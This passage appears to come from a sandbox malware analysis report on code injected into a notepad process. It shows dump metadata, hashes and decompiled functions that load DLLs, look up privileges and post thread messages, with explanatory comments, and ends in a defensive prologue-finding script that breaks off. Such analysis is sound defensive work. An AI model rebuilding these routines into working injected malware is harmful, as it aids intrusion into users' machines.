                                                  • Associated: 00000009.00000002.1045620887.0000000000B80000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045707273.0000000000B84000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045725616.0000000000B87000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045738115.0000000000B90000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1046306994.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_a80000_notepad.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1044571883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: true
                                                  • Associated: 00000009.00000002.1044557902.0000000000A80000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045598601.0000000000B70000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045620887.0000000000B80000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045707273.0000000000B84000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045725616.0000000000B87000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045738115.0000000000B90000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1046306994.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_a80000_notepad.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1044571883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: true
                                                  • Associated: 00000009.00000002.1044557902.0000000000A80000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045598601.0000000000B70000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045620887.0000000000B80000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045707273.0000000000B84000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045725616.0000000000B87000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045738115.0000000000B90000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1046306994.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_a80000_notepad.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1044571883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: true
                                                  • Associated: 00000009.00000002.1044557902.0000000000A80000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045598601.0000000000B70000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045620887.0000000000B80000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045707273.0000000000B84000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045725616.0000000000B87000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045738115.0000000000B90000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1046306994.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_a80000_notepad.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1044571883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: true
                                                  • Associated: 00000009.00000002.1044557902.0000000000A80000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045598601.0000000000B70000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045620887.0000000000B80000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045707273.0000000000B84000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045725616.0000000000B87000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045738115.0000000000B90000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1046306994.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_a80000_notepad.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1044571883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: true
                                                  • Associated: 00000009.00000002.1044557902.0000000000A80000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045598601.0000000000B70000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045620887.0000000000B80000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045707273.0000000000B84000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045725616.0000000000B87000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045738115.0000000000B90000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1046306994.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_a80000_notepad.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1044571883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: true
                                                  • Associated: 00000009.00000002.1044557902.0000000000A80000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045598601.0000000000B70000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045620887.0000000000B80000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045707273.0000000000B84000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045725616.0000000000B87000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045738115.0000000000B90000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1046306994.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_a80000_notepad.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                  • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                  • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                  • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1044571883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: true
                                                  • Associated: 00000009.00000002.1044557902.0000000000A80000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045598601.0000000000B70000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045620887.0000000000B80000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045707273.0000000000B84000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045725616.0000000000B87000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045738115.0000000000B90000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1046306994.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_a80000_notepad.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                  • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                                  • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                  • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1044571883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: true
                                                  • Associated: 00000009.00000002.1044557902.0000000000A80000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045598601.0000000000B70000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045620887.0000000000B80000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045707273.0000000000B84000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045725616.0000000000B87000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045738115.0000000000B90000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1046306994.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_a80000_notepad.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                  • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                  • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                  • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1044571883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: true
                                                  • Associated: 00000009.00000002.1044557902.0000000000A80000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045598601.0000000000B70000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045620887.0000000000B80000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045707273.0000000000B84000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045725616.0000000000B87000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045738115.0000000000B90000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1046306994.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_a80000_notepad.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                  • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                  • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                  • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 95%
                                                  			E00409AB0(intOrPtr* _a4) {
                                                  				intOrPtr _v8;
                                                  				char _v24;
                                                  				char _v284;
                                                  				char _v804;
                                                  				char _v840;
                                                  				void* _t24;
                                                  				signed int _t31;
                                                  				signed int _t33;
                                                  				void* _t34;
                                                  				signed int _t39;
                                                  				void* _t50;
                                                  				intOrPtr* _t52;
                                                  				void* _t53;
                                                  				void* _t54;
                                                  				void* _t55;
                                                  				void* _t56;
                                                  
                                                  				_t52 = _a4;
                                                  				_t39 = 0; // executed
                                                  				_t24 = E00407EA0(_t52,  &_v24); // executed
                                                  				_t54 = _t53 + 8;
                                                  				if(_t24 != 0) {
                                                  					E004080B0( &_v24,  &_v840);
                                                  					_t55 = _t54 + 8;
                                                  					do {
                                                  						E0041BE10( &_v284, 0x104);
                                                  						E0041C480( &_v284,  &_v804);
                                                  						_t56 = _t55 + 0x10;
                                                  						_t50 = 0x4f;
                                                  						while(1) {
                                                  							_t31 = E00414DF0(__eflags, E00414D90(_t52, _t50),  &_v284);
                                                  							_t56 = _t56 + 0x10;
                                                  							__eflags = _t31;
                                                  							if(_t31 != 0) {
                                                  								break;
                                                  							}
                                                  							_t50 = _t50 + 1;
                                                  							__eflags = _t50 - 0x62;
                                                  							if(_t50 <= 0x62) {
                                                  								continue;
                                                  							} else {
                                                  							}
                                                  							L8:
                                                  							_t33 = E004080E0( &_v24,  &_v840);
                                                  							_t55 = _t56 + 8;
                                                  							__eflags = _t33;
                                                  							if(_t33 != 0) {
                                                  								goto L9;
                                                  							}
                                                  							goto L10;
                                                  						}
                                                  						_t9 = _t52 + 0x14; // 0xffffe045
                                                  						_t10 = _t52 + 0x474;
                                                  						 *_t10 =  *(_t52 + 0x474) ^  *_t9;
                                                  						__eflags =  *_t10;
                                                  						_t39 = 1;
                                                  						goto L8;
                                                  						L9:
                                                  						__eflags = _t39;
                                                  					} while (_t39 == 0);
                                                  					L10:
                                                  					_t34 = E00408160(_t52,  &_v24); // executed
                                                  					__eflags = _t39;
                                                  					if(_t39 == 0) {
                                                  						asm("rdtsc");
                                                  						asm("rdtsc");
                                                  						_v8 = _t34 - 0 + _t34;
                                                  						_t16 = _t52 + 0x55c;
                                                  						 *_t16 =  *(_t52 + 0x55c) + 0xffffffba;
                                                  						__eflags =  *_t16;
                                                  					}
                                                  					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
                                                  					_t20 = _t52 + 0x31; // 0x5608758b
                                                  					_t21 = _t52 + 0x32;
                                                  					 *_t21 =  *(_t52 + 0x32) +  *_t20 + 1;
                                                  					__eflags =  *_t21;
                                                  					return 1;
                                                  				} else {
                                                  					return _t24;
                                                  				}
                                                  			}

                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                                  • Instruction ID: 0b46cc9625fd597f0f1293e0fe630cc8c1f9f1e3f005c30533d49d025d22dd75
                                                  • Opcode Fuzzy Hash: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                                  • Instruction Fuzzy Hash: 97210AB2D4020857CB25D674AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                                                  • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0041A6D8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateExitHeapProcess
                                                  • String ID: 6EA
                                                  • API String ID: 1054155344-1400015478
                                                  • Opcode ID: 255655ab164f17740d46e5343843484aa0bdf478bd55110ec30e9b51bc9dcfc8
                                                  • Instruction ID: 2e907044eabaa9d5a8029f8b97c5892acbccb517a4d0db4ef265e5a363abd8cc
                                                  • Opcode Fuzzy Hash: 255655ab164f17740d46e5343843484aa0bdf478bd55110ec30e9b51bc9dcfc8
                                                  • Instruction Fuzzy Hash: F3E0E5711152007BEA20EB54CC80ED33768DF48760F248459F98C5F201C035D9118BE2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph (image not extracted; legend: Executed / Not Executed)
                                                  control_flow_graph 11 41a630-41a661 call 41af60 RtlAllocateHeap
                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID: 6EA
                                                  • API String ID: 1279760036-1400015478
                                                  • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                  • Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
                                                  • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                  • Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph (image not extracted; legend: Executed / Not Executed)
                                                  control_flow_graph 209 408310-40835a call 41be60 call 41ca00 call 40acf0 call 414e50 218 40835c-40836e PostThreadMessageW 209->218 219 40838e-408392 209->219 220 408370-40838a call 40a480 218->220 221 40838d 218->221 220->221 221->219
                                                  C-Code - Quality: 82%
                                                  			E00408310(void* __ecx, void* __eflags, intOrPtr _a4, long _a8) {
                                                  				char _v67;
                                                  				char _v68;
                                                  				void* _t12;
                                                  				intOrPtr* _t13;
                                                  				int _t14;
                                                  				long _t22;
                                                  				intOrPtr* _t26;
                                                  				void* _t27;
                                                  				void* _t31;
                                                  
                                                  				_t31 = __eflags;
                                                  				_v68 = 0;
                                                  				E0041BE60( &_v67, 0, 0x3f);
                                                  				E0041CA00( &_v68, 3);
                                                  				_t12 = E0040ACF0(_t31, _a4 + 0x1c,  &_v68); // executed
                                                  				_t13 = E00414E50(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                                  				_t26 = _t13;
                                                  				if(_t26 != 0) {
                                                  					_t22 = _a8;
                                                  					_t14 = PostThreadMessageW(_t22, 0x111, 0, 0); // executed
                                                  					_t33 = _t14;
                                                  					if(_t14 == 0) {
                                                  						_t14 =  *_t26(_t22, 0x8003, _t27 + (E0040A480(_t33, 1, 8) & 0x000000ff) - 0x40, _t14);
                                                  					}
                                                  					return _t14;
                                                  				}
                                                  				return _t13;
                                                  			}

                                                  APIs
                                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MessagePostThread
                                                  • String ID:
                                                  • API String ID: 1836367815-0
                                                  • Opcode ID: 2d1f258feb65caa57005a4ca8181d3a83820067681332b4e8454df4711668a76
                                                  • Instruction ID: fe648ddaccc693dff6b318d6e20673cc1517f8ca6da234ac2c2ad493b9bfa733
                                                  • Opcode Fuzzy Hash: 2d1f258feb65caa57005a4ca8181d3a83820067681332b4e8454df4711668a76
                                                  • Instruction Fuzzy Hash: FF018431A8032C76E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph (image not extracted; legend: Executed / Not Executed)
                                                  control_flow_graph 224 40acf0-40ad19 call 41cc50 227 40ad1b-40ad1e 224->227 228 40ad1f-40ad2d call 41d070 224->228 231 40ad3d-40ad4e call 41b4a0 228->231 232 40ad2f-40ad3a call 41d2f0 228->232 237 40ad50-40ad64 LdrLoadDll 231->237 238 40ad67-40ad6a 231->238 232->231 237->238
C-Code - Quality: 100%
			// Module loader. The decompiler's struct names (_EXCEPTION_RECORD, _OBJDIR_INFORMATION) are guesses; by the
			// LdrLoadDll prototype (PWCHAR PathToFile, ULONG Flags, PUNICODE_STRING ModuleFileName, PHANDLE ModuleHandle)
			// _v12 and _v8 together form a UNICODE_STRING {Length, MaximumLength, Buffer}, Buffer pointing at the 0x104-WCHAR
			// stack buffer _v536, and _v16 receives the module handle. Helper roles below are inferred from their use here.
			E0040ACF0(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;                                // UNICODE_STRING.Buffer = stack buffer
				_t15 = E0041CC50( &_v12, 0x104, _a8);         // fill the string from the name in _a8, capacity 0x104 (MAX_PATH) WCHARs; non-zero on success
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041D070(__eflags, _v8);          // test on the buffer contents; when it holds, E0041D2F0 adjusts the string in place
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(__eflags != 0) {
						E0041D2F0(__eflags,  &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041B4A0(_v8);                    // lookup by name; a non-zero result is returned as-is, so LdrLoadDll only runs when the module is not already present
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed   (PathToFile = NULL, Flags = 0, ModuleFileName = &UNICODE_STRING, ModuleHandle = &_v16)
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

                                                  APIs
                                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Load
                                                  • String ID:
                                                  • API String ID: 2234796835-0
                                                  • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                  • Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
                                                  • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                  • Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 245 41a7c2-41a7c6 246 41a7c8-41a7ca 245->246 247 41a7dd-41a7ea call 41af60 245->247 249 41a832-41a840 246->249 250 41a7cc-41a7db 246->250 251 41a7ef-41a804 LookupPrivilegeValueW 247->251 250->247
C-Code - Quality: 20%
			// The low quality score reflects a misaligned start: the decompiler began at 0x41a7c2, inside the tail of the
			// preceding function, so the jecxz / repne lodsd / xor sequence is not real code. The immediate 0x8bec8b55 is the
			// byte sequence 55 8B EC 8B (push ebp; mov ebp, esp; mov ...) read as data, i.e. the actual prologue; the second
			// control-flow graph for this region lists the function as 0x41a7d0-0x41a804. Only the E0041AF60 call and the
			// LookupPrivilegeValueW call are meaningful.
			E0041A7C2(signed int __eax, signed int __ecx, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t15;
				void* _t20;
				void* _t23;
				intOrPtr* _t24;
				void* _t28;
				void* _t30;

				asm("jecxz 0x17");                            // not real code (misaligned start)
				asm("repne lodsd");
				if((__eax ^ 0x000000d7) != 0) {
					return  *((intOrPtr*)( *_t24))(_a12, _t20);
				} else {
					_t30 = _t28 - __ecx;
					 *0x8bec8b55 =  *0x8bec8b55 | __ecx;      // 55 8B EC 8B: the real function entry
					_push(_t30);
					// E0041AF60(context, context+0xc8c, *(context+0xa18), 0, 0x46): the same helper and argument shape
					// precede ExitProcess below (+0xc7c, +0xa14, 0x36); a per-API preparation step whose body is not in this excerpt.
					E0041AF60(_t23, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46, _t24);
					_t15 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed   (lpSystemName, lpName, lpLuid)
					return _t15;
				}
			}

                                                  APIs
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LookupPrivilegeValue
                                                  • String ID:
                                                  • API String ID: 3899507212-0
                                                  • Opcode ID: 555316f20e3ebc16c8b5ba02437ec63076d32a3147c768f9d146e1e6745065f6
                                                  • Instruction ID: 45369d00f35f910a4a80ceb0d1db3ea5d15078f9f006c9d75f8f5068cdbb57f7
                                                  • Opcode Fuzzy Hash: 555316f20e3ebc16c8b5ba02437ec63076d32a3147c768f9d146e1e6745065f6
                                                  • Instruction Fuzzy Hash: E8F024B52452442FDB04EF68DC81EE77BA8DF81310F14846EFD8E4B342D134EA21C6A9
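The two low-quality listings in this report (E0041A7C2 and E00407B44) share one cause: the decompiler started a few bytes before the function's real entry, so the standard frame prologue shows up as the data constant 0x8bec8b55. The script below is an added example for recovering the true entry from that symptom; it is not code from the sample or from Joe Sandbox. The E0041A7C2 figures are taken from the listing (decompiler start 0x41a7c2, second control-flow graph starting at 0x41a7d0), but the byte string CODE is constructed, because the report gives addresses and decompiled C rather than raw bytes; only the 14-byte distance and the prologue bytes follow the page.

```python
"""Locate the real entry of a function whose decompilation started mid-instruction.

Added example for this report, not code from the sample. CODE is constructed:
the filler before the prologue is invented, only its length
(0x41a7d0 - 0x41a7c2 = 14 bytes) and the prologue bytes follow the listing.
"""

PROLOGUE = bytes.fromhex("558bec")  # push ebp ; mov ebp, esp


def imm32_hides_prologue(imm):
    """True when a 32-bit immediate in a listing is really prologue bytes read as
    little-endian data (0x8bec8b55 -> 55 8B EC 8B)."""
    return imm.to_bytes(4, "little").startswith(PROLOGUE)


def prologue_candidates(code, base):
    """Virtual addresses in `code` (mapped at `base`) where 55 8B EC begins.
    Functions compiled with the hot-patchable 'mov edi, edi' prefix still match,
    two bytes after their true entry."""
    hits = []
    i = code.find(PROLOGUE)
    while i != -1:
        hits.append(base + i)
        i = code.find(PROLOGUE, i + 1)
    return hits


def true_entry(code, base, decompiler_start):
    """First prologue at or after the address the decompiler took as the start.
    A 55 8B EC inside data or inside a longer instruction is a false positive,
    so confirm the result against the control-flow graph or a disassembler."""
    for addr in prologue_candidates(code, base):
        if addr >= decompiler_start:
            return addr
    return None


BASE = 0x41A7C2   # where the decompiler started (listing above)
ENTRY = 0x41A7D0  # where the second control-flow graph places the function
# Constructed: a ret plus int3 padding standing in for the preceding function's
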